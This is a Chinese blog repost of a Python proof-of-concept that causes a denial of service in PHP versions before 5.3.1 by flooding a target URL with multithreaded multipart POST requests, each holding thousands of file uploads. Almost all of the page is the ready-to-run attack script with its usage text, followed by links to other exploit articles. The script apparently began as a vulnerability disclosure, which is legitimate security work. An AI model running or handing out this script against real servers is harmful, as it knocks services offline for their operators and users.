PHP 5.3.1版本之前的拒绝服务攻击漏洞(附测试代码)
2012-08-09 19:15
253 查看
# # PHP MultiPart Form-Data Denial of Service proof of concept, 23-10-2009 # Bogdan Calin (bogdan@acunetix.com) # import httplib, urllib, sys, string, threading from string import replace from urlparse import urlparse def usage(): print "****************************************************************************" print " PHP MultiPart Form-Data Denial of Service proof of concept" print " Bogdan Calin (bogdan@acunetix.com)" print "" print " Usage: php_mpfd_dos.py url [number_of_threads] [number_of_files] [data]" print "" print " [number_of_threads] - optional, default 10" print " [number_of_files] - optional, default 15000" print " [data] - content of the files, by default it will create files containing" print " the string " print "" print " Example: php_mpfd_dos.pyhttp://ubuntu/index.php" print "****************************************************************************" class PhpMPFDDosThread ( threading.Thread ): # Override Thread's __init__ method to accept the parameters needed: def __init__ ( self, host, path, files ): self.host = host self.path = path self.files = files threading.Thread.__init__ ( self ) # run in loop def run(self): while(1): try: self.post_data() except: print "*", # post multipart_formdata def post_data(self): content_type, body = self.encode_multipart_formdata() h = httplib.HTTPConnection(self.host) headers = { 'User-Agent': 'Opera/9.20 (php_mpfd_dos;poc)', 'Accept': '*/*', 'Content-Type': content_type } h.request('POST', self.path, body, headers) print ".", # encode multipart_formdata def encode_multipart_formdata(self): """ adapted fromhttp://code.activestate.com/recipes/146306/ files is a sequence of (name, filename, value) elements for data to be uploaded as files Return (content_type, body) ready for httplib.HTTP instance """ BOUNDARY = '----------PHP_MPFD_DOS' CRLF = '\r\n' L = [] for (key, filename, value) in self.files: L.append('--' + BOUNDARY) L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) L.append('Content-Type: application/octet-stream') L.append('') L.append(value) L.append('--' + BOUNDARY + '--') L.append('') body = CRLF.join(L) content_type = 'multipart/form-data; boundary=%s' % BOUNDARY return content_type, body def main(): if len(sys.argv)<=1: usage() sys.exit() # default values number_of_threads = 10 number_of_files = 15000 data = "" if len(sys.argv)>2: number_of_threads = int(sys.argv[2]) if len(sys.argv)>3: number_of_files = int(sys.argv[3]) if len(sys.argv)>4: data = sys.argv[4] url = sys.argv[1] print "[-] target: " + url # parse target url up = urlparse(url) host = up.netloc path = up.path # prepare files files = [] for i in range(0, number_of_files): files.append(('fu[]', 'f'+str(i), data)) # start the threads for x in xrange ( number_of_threads ): PhpMPFDDosThread(host, path, files).start() if __name__ == '__main__': main()
相关文章推荐
- phpliteadmin <= 1.9.3 远程php代码执行漏洞测试
- 关于php apache后缀漏洞 附测试代码
- DEDECMS 5.7之前版本远程SQL注入漏洞
- PHP测试代码执行时间
- RabbitMQ 消息队列(centos安装与php下代码测试)
- PHP 5.3.0及以上版本已经内置mysqlnd驱动, 所以安装php时并不需要预先安装mysql, 你可以在安装php之后再安装mysql(这与之前版本的php安装顺序差异较大). mysql
- (转)PHP代码漏洞审核
- struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复
- php下使用以下代码连接并测试
- 微信开发从入门到精通教程大全 资料大全 java和php版本;教程文档、代码、视频 微信商城实例
- Web 安全 PHP 代码审查之常规漏洞
- 破解图片防盗链的代码(asp/php)测试通过
- DedeCMS全版本通杀SQL注入漏洞利用代码及工具
- php中用microtime()函数来测试代码运行时间
- JSQL , SQLProxy 的 php 版本代码
- ecshop 全系列版本网站漏洞 远程代码执行sql注入漏洞
- PHP 5.3.1 安装包 VC9 VC6不同版本的区别是什么
- 学习PHP精粹,编写高效PHP代码之自动测试
- linux/Unix各版本对应溢出漏洞总结(溢出代码)
- WordPress W3 Super Cache插件远程PHP代码执行漏洞